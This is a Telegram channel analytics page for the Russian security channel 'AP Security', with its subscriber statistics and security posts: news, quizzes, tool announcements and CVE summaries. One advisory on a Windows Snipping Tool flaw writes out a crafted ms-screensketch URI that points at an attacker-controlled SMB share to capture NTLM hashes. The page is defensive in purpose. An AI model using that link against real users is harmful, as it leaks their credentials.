Available now! Telegram Research 2025 — the year's key insights 
AP Security
Open in Telegram
Лаборатория инновационных технологий и кибербезопасности компании AP Security. ( Laboratory of innovation technologies and cybersecurity ) Новости, события, мероприятия, технические обзоры По вопросам сотрудничества: @P1N_C0DE
Show more3 948
Subscribers
No data24 hours
-137 days
-2230 days
Data loading in progress...
Similar Channels
Tags Cloud
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
June '26
June '26
+4
in 0 channels
May '26
+37
in 0 channels
Get PRO
April '26
+78
in 2 channels
Get PRO
March '26
+81
in 1 channels
Get PRO
February '26
+40
in 1 channels
Get PRO
January '26
+43
in 1 channels
Get PRO
December '25
+95
in 1 channels
Get PRO
November '25
+103
in 0 channels
Get PRO
October '25
+535
in 1 channels
Get PRO
September '25
+38
in 1 channels
Get PRO
August '25
+56
in 2 channels
Get PRO
July '25
+57
in 1 channels
Get PRO
June '25
+54
in 2 channels
Get PRO
May '25
+78
in 1 channels
Get PRO
April '25
+66
in 2 channels
Get PRO
March '25
+99
in 4 channels
Get PRO
February '25
+480
in 2 channels
Get PRO
January '25
+65
in 2 channels
Get PRO
December '24
+133
in 2 channels
Get PRO
November '24
+254
in 2 channels
Get PRO
October '24
+143
in 2 channels
Get PRO
September '24
+938
in 2 channels
Get PRO
August '24
+61
in 2 channels
Get PRO
July '24
+64
in 4 channels
Get PRO
June '24
+69
in 6 channels
Get PRO
May '24
+46
in 1 channels
Get PRO
April '24
+63
in 1 channels
Get PRO
March '24
+56
in 0 channels
Get PRO
February '24
+245
in 5 channels
Get PRO
January '24
+258
in 3 channels
Get PRO
December '23
+266
in 3 channels
Get PRO
November '23
+72
in 5 channels
Get PRO
October '23
+1 045
in 2 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 10 June | +1 | |||
| 09 June | 0 | |||
| 08 June | 0 | |||
| 07 June | 0 | |||
| 06 June | 0 | |||
| 05 June | +1 | |||
| 04 June | +2 | |||
| 03 June | 0 | |||
| 02 June | 0 | |||
| 01 June | 0 |
Channel Posts
#soc
C2 server fingerprinter 🔩
c2detect — это легковесный сканер для идентификации C2-серверов (Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel) без развёртывания собственной имитирующей инфраструктуры.
Вы передаёте c2detect цель — IP-адрес, домен или URL. Инструмент, не поднимая собственных листенеров, не эмулируя полный бэкконнект и не создавая "тяжёлую" инфраструктуру с несколькими VPS, отправляет на указанный адрес несколько специализированных протокольных запросов (HTTP/HTTPS, DNS, TCP) — каждый запрос заточен на один из пяти фреймворков (Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel).
c2detect работает как MCP-сервер. Любой AI-агент (Claude Desktop, кастомный бот в SOC) может вызвать детектирование через стандартизированный интерфейс, после чего автоматически могут быть приняты меры по блокировке вредоносного адреса.
| 2 | Рубрика: "ИБ на A,B,C,D" №33
Какой из методов лучше всего подходит для защиты конфиденциальной информации на ноутбуке на случай его кражи? | 360 |
| 3 | #byapsecurity
Генератор защиты информации от утечки по ПЭМИН «Кедр-П» 🛡
Средство активной защиты информации от утечки за счет побочных электромагнитных излучений и наводок «Кедр-П», является средством активной защиты типа «А» и типа «Б» 2 класса защиты, предназначенным для защиты объектов информатизации до второй категории включительно от утечки информации по техническим каналам за счет побочных электромагнитных излучений и наводок (ПЭМИН) и может устанавливаться в выделенных помещениях до 2 категории включительно.
Функционал:
✔️дискретная регулировка уровня генерируемого сигнала («0dB», «-10dB», «-20dB»);
✔️ счетчик суммарного времени наработки изделия в активном режиме;
✔️ жидкокристаллический дисплей для вывода информации о режимах работы изделия;
✔️ визуальное и звуковое предупреждение об аварийных режимах работы изделия.
Подробнее✍️: https://apsecurity.ru/products/kedr-p | 516 |
| 4 | #news
ФСТЭК России выпустила рекомендации по борьбе с DDoS 📌
Федеральная служба по техническому и экспортному контролю РФ (ФСТЭК) выпустила методические рекомендации по повышению защищённости сетей от DDoS-атак, или атак типа «отказ в обслуживании». Документ рассчитан на широкий круг учреждений и компаний, включая организации, относящиеся к объектам критической информационной инфраструктуры (КИИ).
Документ размещён на официальном сайте ФСТЭК. Сам 11-страничный документ доступен для загрузки в форматах PDF и Open Document.
В него включён перечень технических мер. В частности, предлагается проводить инвентаризацию сервисов, сегментировать и распределять сервисы, доступные из публичного интернета. Также приведены практические рекомендации по настройке фильтрации трафика на уровне периметрового оборудования — пограничных маршрутизаторов и NGFW.
Источник: https://www.anti-malware.ru/news/2026-05-27-121598/50178 | 479 |
| 5 | #tools
Pentest AI agents 🖥
Claude Code — это AI-агент для программистов. В свою очередь, он автоматически подхватывает агентов и передает им обозначенную пользователем задачу.
В рамках данного проекта собраны агенты, реализующие следующий функционал:
◽️Формирование сценария
◽️Анализ данных, построение векторов атак
◽️Исследование уязвимостей, подготовка PoC
◽️Разработка детектов на атаку. | 490 |
| 6 | Рубрика: "ИБ на A,B,C,D" №32
Какой ключевая характеристика отличает IDS на основе аномалий от IDS на основе сигнатур? | 518 |
| 7 |  #news
Бесплатный VPN оказался банковским трояном: МВД предупредило о новой схеме ✍️
МВД предупредило о новом бесплатном VPN, который на деле оказался совсем не сервисом для приватного доступа в интернет, а банковским трояном с неприятным бонусом в виде загрузчика вредоносных модулей. Схема классическая: пользователь ищет VPN, ставит приложение из стороннего источника, а дальше вместо свободы в Сети получает на устройство зловред.
Пользователям советуют устанавливать приложения только из официальных магазинов, хотя и это, как уточняют в ведомстве, не даёт стопроцентной гарантии безопасности.
История не новая, но всё ещё рабочая: слово «бесплатно» отлично продаёт даже откровенно подозрительный APK. Поэтому правило простое: если VPN найден не в официальном магазине, просит странные разрешения и выглядит как подарок судьбы — скорее всего, подарок там не вам, а мошенникам.
Источник: https://www.anti-malware.ru/news/2026-05-26-111332/50162 | 700 |
| 8 | #tools
DontFeedTheAI 📌
Тема утечки данных в посторонние сервисы, связанные с LLM, становится наиболее актуальной на сегодняшний день.
Представленное решение позволяет в некоторой степени обеспечить с помощью базовых принципов обработку запросов к внешнему ресурсу, запоминая подмену и возвращая ответ пользователю в изначальном виде. | 571 |
| 9 |  #news
Задержан серийный взломщик аккаунтов пользователей маркетплейсов 🔎
Сотрудники отдела по борьбе с противоправным использованием информационно-телекоммуникационных технологий УМВД России по Пензенской области выявили и задержали подозреваемого во взломе учётных записей пользователей маркетплейсов. По версии следствия, он оформлял от их имени покупки дорогостоящих товаров в рассрочку.
Дело было возбуждено после трёх обращений жителей Пензенской области о несанкционированных списаниях с их платёжных карт крупных сумм. Ущерб по этим эпизодам составил 150 тыс. рублей.
От имени владельцев таких аккаунтов он приобретал дорогостоящие товары в рассрочку, а затем перепродавал их. После достижения лимитов на рассрочку злоумышленник, по версии следствия, продавал и сами учётные записи. Кроме того, как выяснилось, фигурант активно регистрировал подставные аккаунты в различных мессенджерах и также торговал ими.
Как сообщили в УМВД по Пензенской области, фигуранту также предъявлены дополнительные обвинения по ч. 2 статьи 272 УК РФ (неправомерный доступ к компьютерной информации) и статье 274.4 УК РФ (организация деятельности по передаче абонентских номеров с нарушением законодательства РФ). Ему избрана мера пресечения в виде заключения под стражу.
Источник: https://www.anti-malware.ru/news/2026-05-22-121598/50137 | 633 |
| 10 |  #news
Задержан серийный взломщик аккаунтов пользователей маркетплейсов 🔎
Сотрудники отдела по борьбе с противоправным использованием информационно-телекоммуникационных технологий УМВД России по Пензенской области выявили и задержали подозреваемого во взломе учётных записей пользователей маркетплейсов. По версии следствия, он оформлял от их имени покупки дорогостоящих товаров в рассрочку.
Дело было возбуждено после трёх обращений жителей Пензенской области о несанкционированных списаниях с их платёжных карт крупных сумм. Ущерб по этим эпизодам составил 150 тыс. рублей.
От имени владельцев таких аккаунтов он приобретал дорогостоящие товары в рассрочку, а затем перепродавал их. После достижения лимитов на рассрочку злоумышленник, по версии следствия, продавал и сами учётные записи. Кроме того, как выяснилось, фигурант активно регистрировал подставные аккаунты в различных мессенджерах и также торговал ими.
Как сообщили в УМВД по Пензенской области, фигуранту также предъявлены дополнительные обвинения по ч. 2 статьи 272 УК РФ (неправомерный доступ к компьютерной информации) и статье 274.4 УК РФ (организация деятельности по передаче абонентских номеров с нарушением законодательства РФ). Ему избрана мера пресечения в виде заключения под стражу.
Источник: https://www.anti-malware.ru/news/2026-05-22-121598/50137 | 0 |
| 11 | #pentest #tools
Cканеры уязвимостей 👩💻
Собранный и отсортированный по количеству звёзд (GitHub и GitLab) перечень открытых инструментов для аудита веб-приложений. | 537 |
| 12 | #pentest #tools
Pentest Copilot ⚙️
Браузерный ИИ-ассистент для специалистов по безопасности, который автоматизирует и облегчает решение задач при тестировании на проникновение. | 745 |
| 13 | #news
Япония готовится к отражению кибератак со стороны ИИ типа Mythos 🔩
Власти Японии обнаружили пробелы в законодательстве, которые препятствуют оперативной работе по отражению и ликвидации последствий возможных кибератак со стороны модели искусственного интеллекта (ИИ) типа Mythos. Министр связи Есимаса Хаяси заявил, что противодействие сложным атакам является «неотложным вопросом», пишет издание The Asahi Shimbun.
Правящая Либерально-демократическая партия призвала правительственные учреждения создать более прочные защитные структуры. Усилия по созданию таких систем в настоящее время предпринимаются быстрыми темпами. 20 апреля состоялось экстренное партийное совещание с приглашением представителей разработчика ИИ Anthropic. Как сообщается, компания выразила готовность помочь Японии в решении проблем.
Источник: https://www.kommersant.ru/doc/8624552 | 633 |
| 14 | #pentest #cve
Dirty Frag: Universal Linux LPE 🖥
Два бага в ядре Linux (CVE-2026-43284 и CVE-2026-43500), позволяющие локальному пользователю без прав получить root через запись шеллкода в кэш страниц системных бинарных файлов (например, /usr/bin/su или /usr/bin/sudo).
Условия эксплуатации:
◽️нужен локальный shell (физический доступ или взломанный пользователь)
◽️любое ядро Linux с 2017 года по апрель 2026 года (до выхода патча)
◽️достаточно любого непривилегированного пользователя
Меры защиты:
📌Срочно обновить ядро до версии с патчем (патч уже выпущен дистрибутивами)
📌 При отсутствии возможности обновиться необходимо заблокировать три модуля ядра - esp4,esp6,rxrpc. Важно: пострадает IPsec ( использует модули esp4, esp6) - блокировка нарушит работу VPN-серверов. Блокировка нарушит работу клиентов файловой системы AFS (Andrew File System) ( модуль rxrpc ).
📌Ограничить локальный доступ к системе — чем меньше непривилегированных пользователей, тем лучше. | 615 |
| 15 | Рубрика: "ИБ на A,B,C,D" №31 #CEH
Какой из перечисленных ниже методов позволяет определить путь прохождения пакета данных от недоверенного внешнего хоста к защищенному внутреннему, находящемуся за брандмауэром? | 609 |
| 16 |  #рубрика | 593 |
| 17 | #news
Контртерроризм по-новому: США вписали наступательные хакерские атаки в национальную стратегию 📶
Администрация США включила наступательные кибероперации в новую контртеррористическую стратегию. Документ предусматривает применение цифровых операций против структур и лиц, считающихся Вашингтоном угрозой американским интересам, а также против пособников подготовки атак на американцев.
Сам формат подобных операций в стратегии не раскрывается, но прямое упоминание кибератак показывает превращение цифровых инструментов в часть государственной силовой политики.
Для союзников США новая стратегия тоже будет иметь значение. При расширении применения наступательных операций в контртеррористической политике другие страны могут копировать модель или ссылаться на неё для обоснования собственных действий.
Источник: https://cisoclub.ru/kontrterrorizm-po-novomu-ssha-vpisali-nastupatelnye-hakerskie-ataki-v-nacionalnuju-strategiju/ | 806 |
| 18 | #cve
CVE-2026-33829 📱
CVE-2026-33829 — это уязвимость в стандартном приложении Windows «Ножницы» (Snipping Tool), раскрывающая хеши Net-NTLMv2 пользователя. Злоумышленнику достаточно заставить жертву перейти по специально созданной ссылке, чтобы перехватить данные для авторизации.
Сам же PoC демонстрирует атаку в локальной сети.
➡️ Проблема кроется в некорректной обработке URI-схемы ms-screensketch. При попытке открыть ссылку вида ms-screensketch:edit?filePath=\\server_злоумышленника\file.png происходит попытка подключения к SMB-серверу, автоматически отправляя хеш пароля.
В случае отсутствия возможности обновления системы до последней версии, наблюдайте за активностью порта 445 (если он не заблокирован на границе сети), а также проинформируйте сотрудников, что стандартные приложения вроде «Ножниц» не должны открываться по запросу из браузера или почты. | 875 |
| 19 | Рубрика: "ИБ на A,B,C,D" №30 #CEH
Как называется набор расширения DNS, предоставляющий аутентификацию владельца домена, подтверждённое отсутствие записи и целостность возвращаемых данных, но не обеспечивает доступность сервера или конфиденциальность? | 748 |
| 20 | #рубрика | 659 |
